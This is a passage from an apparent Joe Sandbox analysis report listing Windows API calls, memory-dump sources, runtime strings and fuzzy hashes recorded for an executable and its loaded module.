                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF8FF5D8BC9,?,?,?,?,00007FF8FF5D8C14), ref: 00007FF8FF5D9650
                                                      • SetLastError.KERNEL32(?,?,?,00007FF8FF5D8BC9,?,?,?,?,00007FF8FF5D8C14), ref: 00007FF8FF5D966B
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Value$ErrorLast
                                                      • String ID:
                                                      • API String ID: 2506987500-0
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                                      • String ID:
                                                      • API String ID: 3326452711-0
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                      • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                                      • API String ID: 2984211723-1229430080
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                                      • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                                      • ExitProcess.KERNEL32 ref: 0000000140008545
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AddressExitHandleModuleProcProcess
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 75539706-1276376045
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AdjustPointer
                                                      • String ID:
                                                      • API String ID: 1740715915-0
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: FileInfoSleepStartupType
                                                      • String ID:
                                                      • API String ID: 1527402494-0
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      Similarity
                                                      • API ID: CommandLine$ByteCharErrorLastMultiWide
                                                      • String ID:
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      Similarity
                                                      • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                      • String ID:
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID:
                                                      APIs
                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF8FF5D766F,?,?,00000000,00007FF8FF5D790A,?,?,?,?,?,00007FF8FF5D7896), ref: 00007FF8FF5D96A3
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF8FF5D766F,?,?,00000000,00007FF8FF5D790A,?,?,?,?,?,00007FF8FF5D7896), ref: 00007FF8FF5D96C2
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF8FF5D766F,?,?,00000000,00007FF8FF5D790A,?,?,?,?,?,00007FF8FF5D7896), ref: 00007FF8FF5D96EA
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF8FF5D766F,?,?,00000000,00007FF8FF5D790A,?,?,?,?,?,00007FF8FF5D7896), ref: 00007FF8FF5D96FB
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF8FF5D766F,?,?,00000000,00007FF8FF5D790A,?,?,?,?,?,00007FF8FF5D7896), ref: 00007FF8FF5D970C
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      Similarity
                                                      • API ID: Value
                                                      • String ID:
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      Similarity
                                                      • API ID: Value
                                                      • String ID:
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      Similarity
                                                      • API ID: CallEncodePointerTranslator
                                                      • String ID: MOC$RCC
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      Similarity
                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                      • String ID: csm
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      Similarity
                                                      • API ID: CallEncodePointerTranslator
                                                      • String ID: MOC$RCC
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      Similarity
                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                      • String ID: csm$csm
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      Similarity
                                                      • API ID: AddressHandleLoadModuleProc
                                                      • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      Similarity
                                                      • API ID: Process$CurrentSizeWorking
                                                      • String ID: Shrinking process size
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      Similarity
                                                      • API ID: CriticalSection$Enter$Leave
                                                      • String ID:
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      Similarity
                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                      • String ID:
                                                      APIs
                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF8FF5DED07), ref: 00007FF8FF5DEE38
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF8FF5DED07), ref: 00007FF8FF5DEEC3
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      Similarity
                                                      • API ID: ConsoleErrorLastMode
                                                      • String ID:
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                                      • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                                      • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      Similarity
                                                      • API ID: CriticalEventSection$EnterLeaveReset
                                                      • String ID:
                                                      • API String ID: 3553466030-0
                                                      • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                      • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                                      • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                      • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalEventSection$EnterLeaveReset
                                                      • String ID:
                                                      • API String ID: 3553466030-0
                                                      • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                      • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                                      • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                      • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                       • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                      • String ID:
                                                      • API String ID: 2933794660-0
                                                      • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                      • Instruction ID: a042b3e456ddfda8297d21961ad4b93d947f4da912abe79d03f042b509ec0f0d
                                                      • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                      • Instruction Fuzzy Hash: 8A110A26B14B058AEB00CF60EC562A837A4F769798F440E31DA7D477E8EF78D1558740
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CreateEvent$CriticalInitializeSection
                                                      • String ID:
                                                      • API String ID: 926662266-0
                                                      • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                      • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                                      • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                      • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                       • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: __except_validate_context_record
                                                      • String ID: csm$csm
                                                      • API String ID: 1467352782-3733052814
                                                      • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                      • Instruction ID: 57d9daa4bd9cd655dd03c069fc7147f31b58ef6cc4691fed317d46817ffb81e1
                                                      • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                      • Instruction Fuzzy Hash: 0271AF3290E6818FDB609B25994077D7BA0EB28FC9F048235DEBC47AD9CB2CD551C741
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                       • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 2558813199-1018135373
                                                      • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                      • Instruction ID: dba4bd1eee6ccd1245f2625eba6fd153ea7f4eef6fe8aad55eeb10d51de7f55f
                                                      • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                      • Instruction Fuzzy Hash: D5514F3661EB419BD720AF15E84026DB7A4FB99BD0F100239EBAD17B95CF38E461CB01
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                       • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastWrite
                                                      • String ID: U
                                                      • API String ID: 442123175-4171548499
                                                      • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                      • Instruction ID: 83d81b29b2abbcc2e6c6be71828f22d0ba1287447fde186218da84b6dbf09546
                                                      • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                      • Instruction Fuzzy Hash: 4B41C522A1E65186EB208F65E8453A96761F7987C4F404131DA5E87795DF3CE441CB40
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID: csm
                                                      • API String ID: 3997070919-1018135373
                                                      • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                      • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                                      • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                      • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                                      APIs
                                                        • Part of subcall function 00007FF8FF5D3A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FF8FF5D3A63
                                                      • __GSHandlerCheckCommon.LIBCMT ref: 00007FF8FF5E0993
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                       • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CheckCommonHandler__except_validate_context_record
                                                      • String ID: csm$f
                                                      • API String ID: 1543384424-629598281
                                                      • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                      • Instruction ID: 2d3cf11547db211a2c02104edaa08bd2c933143203a896691b1518c0b1ff0ef7
                                                      • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                      • Instruction Fuzzy Hash: D1110632A187818AE710AF52E84116DA764EB59FC4F188135EFA80BB86CE38D851CB00
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: TimerWaitable
                                                      • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                      • API String ID: 1823812067-484248852
                                                      • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                      • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                                      • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                      • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                                      APIs
                                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8FF5D112F), ref: 00007FF8FF5D39E0
                                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8FF5D112F), ref: 00007FF8FF5D3A21
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                       • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFileHeaderRaise
                                                      • String ID: csm
                                                      • API String ID: 2573137834-1018135373
                                                      • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                      • Instruction ID: f3ea602b64d858c408b30e1d39a607e0b7c0ed017a7bdfd6211192f1feb99256
                                                      • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                      • Instruction Fuzzy Hash: F2115E32A09B4182EB608F15E800269B7E5FB9CB88F584330DEAD07798DF3CD552CB00
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: TimerWaitable
                                                      • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                      • API String ID: 1823812067-3336177065
                                                      • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                      • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                                      • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                      • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
